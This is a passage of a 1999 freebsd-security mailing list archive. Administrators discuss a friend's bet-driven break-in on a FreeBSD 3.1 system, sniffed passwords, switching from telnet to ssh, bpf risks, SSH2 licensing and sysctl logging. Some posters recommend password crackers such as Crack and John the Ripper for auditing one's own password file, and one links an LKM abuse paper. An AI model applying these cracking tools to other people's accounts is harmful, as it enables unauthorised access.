with ESMTP id UAA07249; Fri, 28 May 1999 20:13:23 -0500 (CDT) (envelope from: john@vapornet.net) Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id UAA30705; Fri, 28 May 1999 20:13:07 -0500 (CDT) (envelope from: john@vapornet.net) Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id UAA29676; Fri, 28 May 1999 20:12:53 -0500 (CDT) (envelope from: john@vapornet.net) From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Fri, 28 May 1999 20:12:53 -0500 (CDT) To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: References: <199905280927.OAA08009@nic.mmc.net.ge> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14159.15859.140011.281075@habanero.chili-pepper.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You never mentioned which 3rd party applications [ports,packages, et cetera] you installed on this machine. its quite possible one of those were compromised [see also qpopper, imapd, and wu-ftpd] $0.02 worth. -j Michael Richards writes: > On Fri, 28 May 1999, Dima wrote: > > > can hack into my system. He has ordinary account opened. So, he win! And > > i'am wondering if there are any security holes in 3.1? He login as > > himself via telnet, then he made him root (but he was not in wheel group > > and ofcourse did not know root password) and what is more interesting he > Finding an exploitable suid program would allow this to happen. > > > cracked several password. He made all this in 2 houres, and password was > > minimal 10 symbols lenght, containg different case and digits. I am > > using MD5 codding, and as I knew it is impossible. Has someone any idea > I would do 2 things: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I played with crack once a long time ago and > based on what you've said about the cracked password, I belive it is more > likely that he > a) broke root > b) sniffed the passwords > > or maybe he shoulder surfed the passwords... I don't believe that md5 can > be cracked that quickly. I guess it depends on the randomness of the > password. "thisissEcur3" might take a week, but crack will still get it. > I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all > the other commonly substituted letters. > > -Michael > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 18:27:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from ptldpop2.ptld.uswest.net (ptldpop2.ptld.uswest.net [198.36.160.2]) by hub.freebsd.org (Postfix) with SMTP id 73E9915A73 for ; Fri, 28 May 1999 18:27:22 -0700 (PDT) (envelope-from dpilgrim@uswest.net) Received: (qmail 25890 invoked by alias); 29 May 1999 01:27:20 -0000 Delivered-To: fixup-security@FreeBSD.ORG@fixme Received: (qmail 25872 invoked by uid 0); 29 May 1999 01:27:18 -0000 Received: from cdsl201.ptld.uswest.net (HELO uswest.net) (209.180.170.201) by ptldpop2.ptld.uswest.net with SMTP; 29 May 1999 01:27:18 -0000 Message-ID: <374F4268.F4993C8B@uswest.net> Date: Fri, 28 May 1999 18:27:04 -0700 From: Organization: Neatly stacked heaps of digital chaos X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Richards wrote: > > On Fri, 28 May 1999, Dima wrote: > > > can hack into my system. He has ordinary account opened. So, he win! And > > i'am wondering if there are any security holes in 3.1? He login as > > himself via telnet, then he made him root (but he was not in wheel group > > and ofcourse did not know root password) and what is more interesting he > Finding an exploitable suid program would allow this to happen. > > > cracked several password. He made all this in 2 houres, and password was > > minimal 10 symbols lenght, containg different case and digits. I am > > using MD5 codding, and as I knew it is impossible. Has someone any idea > I would do 2 things: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I played with crack once a long time ago and > based on what you've said about the cracked password, I belive it is more > likely that he > a) broke root > b) sniffed the passwords > > or maybe he shoulder surfed the passwords... I don't believe that md5 can > be cracked that quickly. I guess it depends on the randomness of the > password. "thisissEcur3" might take a week, but crack will still get it. > I think one of the first rules is to replace [il]=1 e=3 s=5 a=4 and all > the other commonly substituted letters. I wrote a password cracking/guessing program that has an option to do 'leet character substitutions, they're far too well known and thus not a very good way to make a password secure. Case-sensitive alphanumeric random character generation is far more secure, with an 8 character password having over 136.3 trillion possibilities assuming no repeat characters. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 21:51:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 68B8214E6D for ; Fri, 28 May 1999 21:51:44 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id AAA09482 for ; Sat, 29 May 1999 00:51:43 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: security@FreeBSD.ORG Subject: Re: System beeing cracked! Date: Sat, 29 May 1999 05:02:51 GMT Message-ID: <374f731c.607312609@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 28 May 1999 05:26:55 -0400, in sentex.lists.freebsd.misc you wrote: >Hello, >I have 3.1 installed and friend of mine made a bet that he can hack >into my system. He has ordinary account opened. >security holes in 3.1? He login as himself >it was done? Please, answer me, >as my friend do not tell me anything >about this as he feel like guru-hacker. >Thank you. Did your friend have access to a machine on the same ethernet ? He could have sniffed your password and the root's password, and then logged in as you, and then su'd to root. ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 28 23:10:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from vital.bleeding.com (vital.bleeding.com [206.251.12.170]) by hub.freebsd.org (Postfix) with ESMTP id AEC8515139 for ; Fri, 28 May 1999 23:10:09 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Received: from crimson (crimson [144.254.195.6]) by vital.bleeding.com (8.9.2/8.9.2) with SMTP id XAA02684 for ; Fri, 28 May 1999 23:10:09 -0700 (PDT) (envelope-from jjwolf@bleeding.com) Message-ID: <006201bea999$ee5e4b00$06c3fe90@cisco.com> From: "Justin Wolf" To: References: <374f731c.607312609@mail.sentex.net> Subject: Re: System beeing cracked! Date: Fri, 28 May 1999 23:10:14 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Did your friend have access to a machine on the same ethernet ? He could > have sniffed your password and the root's password, and then logged in as > you, and then su'd to root. To add my own meger two cents: My machine (running 2.2.8-R) was recently hacked because someone got their password sniffed (on another network). The attacker then used this account to gain root. Fortunately they didn't do any damage except change the root password (and perhaps trojan the kernel). When I reinstalled with 3.1-R, I turned off ftpd and telnetd in inetd.conf. The only way to get to the machine now is via ssh/scp (since there are ssh clients for all major OSes these days, it's not too much of a hardship... Windows even has a (ssh2) version of scp now). This makes it more or less impossible for someone on the same net to sniff passwords. I never EVER su to root unless I'm on a 100% secure (ssh) session. Obviously there are still holes that people can exploit, but my feeling was that this is probably the easiest way to gain root privledges, so this is the hole I plugged. The basic security rule is: Never run any services unless you have to. Don't have bpf compiled into the kernel. Get strobe and run it on localhost - see what's open. You might not even expect the results (such as X forwarding and RPC). And lastly, always keep up on CERT and BugTraq, and run the latest version of all software (ssh, popper, sendmail, etc.) and patches. Good luck, -Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 7:26:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id CDF7615053 for ; Sat, 29 May 1999 07:26:53 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA27587; Sat, 29 May 1999 18:26:25 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Sat, 29 May 1999 18:25:40 +0400 Received: from undisclosed-intranet-sender id xma003114; Sat, 29 May 99 18:25:36 +0400 From: -=ArkanoiD=- Message-Id: <199905291425.SAA20774@paranoid.eltex.spb.ru> Subject: Re: legal notice for telnet/etc In-Reply-To: <19990528161807.A1393@best.com> from "Jan B. Koum " at "May 28, 1999 04:18:07 pm" To: jkb@best.com (Jan B. Koum ) Date: Sat, 29 May 1999 18:25:20 +0400 (MSD) Cc: ncb@zip.com.au, sheldonh@uunet.co.za, freebsd-security@FreeBSD.ORG Reply-To: ark@eltex.ru X-Mailer: ELM [version 2.4ME+ PL53 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Cool. Except you need http server - and that is not always acceptable.. Do you have that implemented? Scripts etc? Somebody (maybe you, Jan B. Koum ) WROTE: > > If you need to tinker, then for ssh you can do something similar to > the following: > > user goes to https://ssh.yourcompany.com > > The page asks username:password and present user with an agreement > of usage. If he will agree by clicking on "I Agree", you give him a new ssh > RSA key (ssh-keygen) and while he takes a second to download it, you place > the key in his $HOME/.ssh > > They weak part in the picture is username:passwd -- replace is with > something like Cryptocard (www.cryptocard.com -- which happen to support > FreeBSD btw) and you all set. They actually have apache module to auth > against their radiusd server ... Tinker away Nick. ;) > > > -- yan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 7:58:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 5ACF014CFD for ; Sat, 29 May 1999 07:58:12 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA12413; Sat, 29 May 1999 16:58:05 +0200 (CEST) (envelope-from des) To: "Harry M. Leitzell" Cc: Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) References: From: Dag-Erling Smorgrav Date: 29 May 1999 16:58:05 +0200 In-Reply-To: "Harry M. Leitzell"'s message of "Fri, 28 May 1999 18:54:37 -0400 (EDT)" Message-ID: Lines: 10 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Harry M. Leitzell" writes: > I am personally curious as to whether or not someone has developed > a free SSH2 daemon yet. That's a contradiction in terms. AFAIK, the SSH2 protocol is proprietary. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 8: 3:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 69A4914CFD for ; Sat, 29 May 1999 08:03:15 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA12426; Sat, 29 May 1999 17:00:30 +0200 (CEST) (envelope-from des) To: Michael Richards <026809r@dragon.acadiau.ca> Cc: Dima , security@FreeBSD.ORG Subject: Re: System beeing cracked! References: From: Dag-Erling Smorgrav Date: 29 May 1999 17:00:30 +0200 In-Reply-To: Michael Richards's message of "Fri, 28 May 1999 20:51:05 -0300 (ADT)" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Richards <026809r@dragon.acadiau.ca> writes: > a) take your master.passwd file and run crack on it yourself and see if it > finds the passwords itself. I've found John to be far more powerful. It's in the ports. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:20:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 505D914CFF for ; Sat, 29 May 1999 09:20:51 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.iserver.com; Sat, 29 May 1999 10:20:52 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma027221; Sat, 29 May 99 10:20:27 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id KAA23105; Sat, 29 May 1999 10:19:38 -0600 (MDT) Date: Sat, 29 May 1999 10:19:38 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29 May 1999, Dag-Erling Smorgrav wrote: > > a) take your master.passwd file and run crack on it yourself and see if it > > finds the passwords itself. > > I've found John to be far more powerful. It's in the ports. Yes, I would second that opinion. John the Ripper understands many of the non-DES crypt replacements used in various UNIX versions, such as FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly language versions of the hashing algorithms on many target architectures. It is probably the best overall password cracker available, in my opinion. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:37:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id A644F14CFF for ; Sat, 29 May 1999 09:37:50 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com) Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nm7J-000NHP-00 for freebsd-security@freebsd.org; Sat, 29 May 1999 19:37:49 +0300 From: Vladimir Litovka To: freebsd-security@freebsd.org Reply-To: Vladimir Litovka Subject: Re: TCP connect data logger Date: 29 May 1999 16:37:49 GMT Message-ID: <7ip54t$2n98$2@news.kiev.sovam.com> X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport) X-Gated-By: news2list v1.3, (c) Vladimir Litovka X-Gated-Date: Sat May 29 16:37:49 1999 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey wrote: > The sysctl net.inet.udp.log_in_vain option seems to be the one. Where are these sysctl's variables desribed? I didn't find them in man for sysctl - there are small amount of variables... Thank you. -- doka To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:43:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id D70D714F8F for ; Sat, 29 May 1999 09:43:44 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com) Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nmD2-000NI3-00 for freebsd-security@freebsd.org; Sat, 29 May 1999 19:43:44 +0300 From: Vladimir Litovka To: freebsd-security@freebsd.org Reply-To: Vladimir Litovka Subject: Re: TCP connect data logger Date: 29 May 1999 16:43:43 GMT Message-ID: <7ip5fv$2n98$3@news.kiev.sovam.com> References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport) X-Gated-By: news2list v1.3-pl1, (c) Vladimir Litovka X-Gated-Date: Sat May 29 16:43:44 1999 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey wrote: Where are these sysctl's variables desribed? I didn't find them in man for sysctl - there are small amount of variables... Thank you. -- doka To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 9:58:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id B9E581520E for ; Sat, 29 May 1999 09:58:36 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37186.sympatico.ca [209.226.141.253]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id NAA10864; Sat, 29 May 1999 13:01:19 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id MAA04836; Sat, 29 May 1999 12:58:33 -0400 (EDT) Date: Sat, 29 May 1999 12:58:32 -0400 From: Bryan Fullerton To: Dag-Erling Smorgrav Cc: "Harry M. Leitzell" , Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) Message-ID: <19990529125832.B435@samurai.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: ; from Dag-Erling Smorgrav on Sat, May 29, 1999 at 04:58:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote: > "Harry M. Leitzell" writes: > > I am personally curious as to whether or not someone has developed > > a free SSH2 daemon yet. > > That's a contradiction in terms. AFAIK, the SSH2 protocol is > proprietary. That would surprise the IETF. See http://www.net.lut.ac.uk/psst/ for links to the IETF working group documents regarding making the ssh2 protocol an Internet standard, as well as links to a GPL'ed ssh2 implementation (in early development - currently at v0.1). Bryan -- Bryan Fullerton http://www.samurai.com/ Core Competency Samurai Consulting "No, we don't do seppuku." Can you feel the Ohmu call? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 14:43:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.cybcon.com (mail.cybcon.com [205.147.64.46]) by hub.freebsd.org (Postfix) with ESMTP id E4BB314C56 for ; Sat, 29 May 1999 14:43:06 -0700 (PDT) (envelope-from wwoods@cybcon.com) Received: from william (usr1-37.cybcon.com [205.147.75.38]) by mail.cybcon.com (8.9.0/8.9.0) with SMTP id OAA12475; Sat, 29 May 1999 14:43:03 -0700 (PDT) From: "William Woods" To: "Justin Wolf" Cc: "FreeBSD Security" Subject: RE: System beeing cracked! Date: Sat, 29 May 1999 14:43:04 -0700 Message-ID: <000001beaa1c$3b44bf80$264b93cd@william> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <006201bea999$ee5e4b00$06c3fe90@cisco.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > unless you have to. Don't have bpf compiled into the kernel. Get strobe OK....why is this a bad thig? I need bpf (or so I understand) to use nmap William To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 15:49:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id DAFA714F92 for ; Sat, 29 May 1999 15:49:52 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id PAA21150; Sat, 29 May 1999 15:48:48 -0700 (PDT) Message-ID: <19990529154848.A19679@best.com> Date: Sat, 29 May 1999 15:48:48 -0700 From: "Jan B. Koum " To: Dag-Erling Smorgrav , "Harry M. Leitzell" Cc: Nicholas Brawn , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Dag-Erling Smorgrav on Sat, May 29, 1999 at 04:58:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote: > "Harry M. Leitzell" writes: > > I am personally curious as to whether or not someone has developed > > a free SSH2 daemon yet. > > That's a contradiction in terms. AFAIK, the SSH2 protocol is > proprietary. > > DES > -- > Dag-Erling Smorgrav - des@flood.ping.uio.no > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Ahem. You are not correct I think. The ssh2 software which people in www.ssh.fi land wrote has a very restricted license, but the protocol itself is open. See: http://www.ietf.cnri.reston.va.us/ids.by.wg/secsh.html for IETF drafts. [this is like tcp/ip -- MS has a proprietary stack, but protocol is open] -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 16: 8:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 5C66C14CC6 for ; Sat, 29 May 1999 16:08:46 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id QAA23069; Sat, 29 May 1999 16:08:17 -0700 (PDT) Message-ID: <19990529160817.B19679@best.com> Date: Sat, 29 May 1999 16:08:17 -0700 From: "Jan B. Koum " To: Vladimir Litovka , freebsd-security@FreeBSD.ORG Subject: Re: TCP connect data logger References: <19990525000758.A14670@fw.garman.net> <199905250414.OAA03109@henry.cs.adfa.edu.au> <7ip5fv$2n98$3@news.kiev.sovam.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <7ip5fv$2n98$3@news.kiev.sovam.com>; from Vladimir Litovka on Sat, May 29, 1999 at 04:43:43PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 04:43:43PM +0000, Vladimir Litovka wrote: > Warren Toomey wrote: > > Where are these sysctl's variables desribed? I didn't find them in man for > sysctl - there are small amount of variables... > > Thank you. > > -- > doka Smotri v source: vi /usr/src/sys/netinet/tcp_input.c -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 16:20:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id BE5A214ED6 for ; Sat, 29 May 1999 16:20:01 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id BAA04350 for security@FreeBSD.ORG; Sun, 30 May 1999 01:19:58 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id CB62387AE; Sun, 30 May 1999 00:02:48 +0200 (CEST) (envelope-from roberto) Date: Sun, 30 May 1999 00:02:48 +0200 From: Ollivier Robert To: security@FreeBSD.ORG Subject: Re: System beeing cracked! Message-ID: <19990530000248.A6429@keltia.freenix.fr> Mail-Followup-To: security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: ; from Paul Hart on Sat, May 29, 1999 at 10:19:38AM -0600 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Paul Hart: > non-DES crypt replacements used in various UNIX versions, such as > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly So does Crack 5.0a, I know, I gave Alec the pointers to it because he told me that he was a Linux guy but wanted to support our scheme :-) OpenBSD is not supported though because Crack was out before they implemented it. > It is probably the best overall password cracker available, in my opinion. I've not looked at JtR recently but I like the rule-based way of doing things used in Crack. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 17: 0:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from ecpi.com (ns1.ecpi.com [208.21.246.3]) by hub.freebsd.org (Postfix) with ESMTP id 6CDAE14DED for ; Sat, 29 May 1999 17:00:43 -0700 (PDT) (envelope-from tpatel@ecpi.com) Received: from vishnu ([208.21.246.30]) by ecpi.com (8.8.8/8.8.8) with SMTP id SAA07002 for ; Sat, 29 May 1999 18:54:41 -0500 (CDT) Message-ID: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> From: "Tushar Patel" To: Subject: POP3 server with SSL Date: Sat, 29 May 1999 18:56:53 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, We need to allow few people to access their pop3 e-mail over secure connection. Is there a way to run pop3 server with SSL support? Any pointers will be good help. Thanks, Tushar tpatel @ ecpi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 17: 3:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id D811D14CF9 for ; Sat, 29 May 1999 17:03:39 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id RAA28474; Sat, 29 May 1999 17:03:25 -0700 (PDT) Message-ID: <19990529170325.A28298@best.com> Date: Sat, 29 May 1999 17:03:25 -0700 From: "Jan B. Koum " To: William Woods , Justin Wolf Cc: FreeBSD Security Subject: Re: System beeing cracked! References: <006201bea999$ee5e4b00$06c3fe90@cisco.com> <000001beaa1c$3b44bf80$264b93cd@william> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <000001beaa1c$3b44bf80$264b93cd@william>; from William Woods on Sat, May 29, 1999 at 02:43:04PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 02:43:04PM -0700, William Woods wrote: > > unless you have to. Don't have bpf compiled into the kernel. Get strobe > > OK....why is this a bad thig? I need bpf (or so I understand) to use nmap > > William > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Usually if someone cracks root on your box, they can then sniff the LAN for pop3/telnet/ftp passwords and compromise other systems on that LAN. On the other hand, if someone cracks root and you have LKM (or KLD) enabled, a skilled attacker can just insert a bpf module into a running system I would guess. There is a paper on how to abuse LKM under linux at: http://www.infowar.co.uk/thc/files/thc/LKM_HACKING.html -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 19:20:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id CF1CF14CB1 for ; Sat, 29 May 1999 19:20:30 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.193] by 